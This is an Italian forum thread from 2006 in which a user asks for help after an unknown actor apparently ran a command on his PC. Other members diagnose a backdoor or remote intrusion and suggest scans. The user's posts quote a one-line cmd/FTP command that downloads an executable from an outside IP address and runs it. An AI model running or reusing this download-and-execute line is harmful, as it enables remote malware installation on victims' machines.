Torna indietro   Hardware Upgrade Forum > Networking e sicurezza > Antivirus e Sicurezza > Aiuto sono infetto! Cosa faccio?

Nioh 3: souls-like punitivo e Action RPG
Nioh 3: souls-like punitivo e Action RPG
Nioh 3 aggiorna la formula Team NINJA con aree esplorabili più grandi, due stili di combattimento intercambiabili al volo (Samurai e Ninja) e un sistema di progressione pieno di attività, basi nemiche e sfide legate al Crogiolo. La recensione entra nel dettaglio su combattimento, build, progressione e requisiti PC
Test in super anteprima di Navimow i220 LiDAR: il robot tagliaerba per tutti
Test in super anteprima di Navimow i220 LiDAR: il robot tagliaerba per tutti
La facilità di installazione e la completa automazione di tutte le fasi di utilizzo, rendono questo prodotto l'ideale per molti clienti. Ecco com'è andata la nostra prova in anteprima
Dark Perk Ergo e Sym provati tra wireless, software via browser e peso ridotto
Dark Perk Ergo e Sym provati tra wireless, software via browser e peso ridotto
be quiet! debutta nel settore mouse da gaming con Dark Perk Ergo e Dark Perk Sym: due modelli gemelli per specifiche, con polling rate di 8.000 Hz anche in wireless, sensore PixArt PAW3950 da 32.000 DPI e autonomia dichiarata fino a 110 ore. Nel test, a 8.000 Hz si arriva a circa 30 ore reali, con ricarica completa in un'ora e mezza
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 14-11-2006, 16:57   #1
mibfb
Member
 
Iscritto dal: Feb 2003
Messaggi: 49
[help] effetto a cui non so dare spiegazione

salve, oggi pomeriggio ero tranquillamente davanti al computer quando mi e' successo un fatto inspiegabile. a un certo punto il mouse mi e' aprtito ha aperto lo start e la voce "esegui" inserendo e lanciando questa frase:

cmd /c echo OPEN 151.37.183.77 18488>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit


ora aprimo sguardo penso che sia stato qualcuno che e' entrato nel mio pc e ha tentato di cancellare norton. ditemi la vostra e nel caso quali precauzioni prendere e sopratutto cosa questo comando ha fatto al mio pc.

grazie
mibfb è offline   Rispondi citando il messaggio o parte di esso
Old 14-11-2006, 18:01   #2
GmG
Senior Member
 
L'Avatar di GmG
 
Iscritto dal: Aug 2006
Città: Riviera del Brenta
Messaggi: 2056
Quote:
Originariamente inviato da mibfb
salve, oggi pomeriggio ero tranquillamente davanti al computer quando mi e' successo un fatto inspiegabile. a un certo punto il mouse mi e' aprtito ha aperto lo start e la voce "esegui" inserendo e lanciando questa frase:

cmd /c echo OPEN 151.37.183.77 18488>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit


ora aprimo sguardo penso che sia stato qualcuno che e' entrato nel mio pc e ha tentato di cancellare norton. ditemi la vostra e nel caso quali precauzioni prendere e sopratutto cosa questo comando ha fatto al mio pc.

grazie

Non è qualcuno che ti è entrato nel pc ma hai qualcosa nel pc che ha usato dei comandi da prompt per scaricare con FTP il file 84785_norton.exe e poi eseguirlo.
GmG è offline   Rispondi citando il messaggio o parte di esso
Old 14-11-2006, 21:06   #3
mibfb
Member
 
Iscritto dal: Feb 2003
Messaggi: 49
si ma il norton questa cosa me la dovrebbe trovare giusto? e poi come e' avvenuto il fatto mi ha fatto proprio pensare a un attacco visto cheho visto partire il mouse andare su start aprire l'esegui e incollare quella stringa e lanciare.
mibfb è offline   Rispondi citando il messaggio o parte di esso
Old 15-11-2006, 19:15   #4
blackbit
Senior Member
 
Iscritto dal: Aug 2006
Città: Reggio Calabria
Messaggi: 1774
più ke comando remoto sembra proprio desktop remoto! xkè il mouse da solo non si muove.

stacci attento, proteggiti a dovere ke internet non è un giardinetto
blackbit è offline   Rispondi citando il messaggio o parte di esso
Old 16-11-2006, 22:41   #5
bReAkDoWn
Senior Member
 
L'Avatar di bReAkDoWn
 
Iscritto dal: Jun 2003
Città: ..By The Sea..
Messaggi: 564
Quote:
Originariamente inviato da mibfb
salve, oggi pomeriggio ero tranquillamente davanti al computer quando mi e' successo un fatto inspiegabile. a un certo punto il mouse mi e' aprtito ha aperto lo start e la voce "esegui" inserendo e lanciando questa frase:

cmd /c echo OPEN 151.37.183.77 18488>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit


ora aprimo sguardo penso che sia stato qualcuno che e' entrato nel mio pc e ha tentato di cancellare norton. ditemi la vostra e nel caso quali precauzioni prendere e sopratutto cosa questo comando ha fatto al mio pc.

grazie
Avevi mica attivo un server winvnc? Altrimenti potresti avere una backdoor che permette a un utente remoto di eseguire operazioni sul tuo pc. Fai in ogni caso qualche scansione online.

Come giustamente ti hanno detto, qualcuno o qualcosa ha scaricato ed eseguito quel file sul tuo pc, ma quello che è strano è il modo in cui è stato eseguito il comando. Fosse stato un trojan o cmq un programma in esecuzione sul tuo pc, avrebbe scelto la strada più difficile e allo stesso tempo plateale per eseguire quella operazione. Infatti un programma avrebbe potuto tranquillamente scaricare ed eseguire il file senza che tu ti accorgessi di niente, e anche a livello di codice sarebbe stato molto più semplice che far spostare il mouse, eseguire un click ecc. Inoltre considerando l'indirizzo a cui ti hanno fatto accedere, l'ipotesi di intervento manuale si rafforza.
Esso infatti corrisponde ad adsl-77-183.37-151.net24.it: una adsl di libero. Probabilmente questo qualcuno ha aperto un server ftp sul suo pc e l'ha utilizzato temporaneamente per far arrivare quel file sul tuo computer lanciando una sessione ftp.
Infine, se vuoi sapere cosa abbia fatto quel file, l'unica cosa che puoi fare è provare a cercarlo nel tuo pc. Esegui anche tu cmd, poi esegui dir e guarda se il file c'è ancora. Se non lo trovi lì prova a cercarlo in tutte le cartelle con la funzione trova file o cartelle di windows.
__________________
Without Contraries is no Progression...
bReAkDoWn è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


Nioh 3: souls-like punitivo e Action RPG Nioh 3: souls-like punitivo e Action RPG
Test in super anteprima di Navimow i220 LiDAR: il robot tagliaerba per tutti Test in super anteprima di Navimow i220 LiDAR: i...
Dark Perk Ergo e Sym provati tra wireless, software via browser e peso ridotto Dark Perk Ergo e Sym provati tra wireless, softw...
DJI RS 5: stabilizzazione e tracking intelligente per ogni videomaker DJI RS 5: stabilizzazione e tracking intelligent...
AMD Ryzen 7 9850X3D: Zen 5, 3D V-Cache e frequenze al top per il gaming AMD Ryzen 7 9850X3D: Zen 5, 3D V-Cache e frequen...
8 smartphone Android in forte sconto su ...
Samsung House apre a Milano: la casa tec...
Broadcom esclude i cloud provider pi&ugr...
Allerta sicurezza per n8n: come protegge...
NIO raggiunge il primo storico profitto ...
Memorie DDR5 cinesi nel tuo prossimo PC?...
Volkswagen e Stellantis chiedono all'UE ...
Final Fantasy VII Remake Parte 3 potrebb...
Lo spettacolo pirotecnico della Xiaomi S...
Black Myth: Wukong potrebbe approdare su...
Aruba e Ducati: la Superbike come labora...
Qualcomm vola nei conti, ma l'industria ...
F1: The Movie, Apple e Formula 1 aprono ...
Amazon Seconda Mano: arriva il 10% extra...
Sysmon diventa nativo su Windows 11: com...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 15:06.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
Served by www3v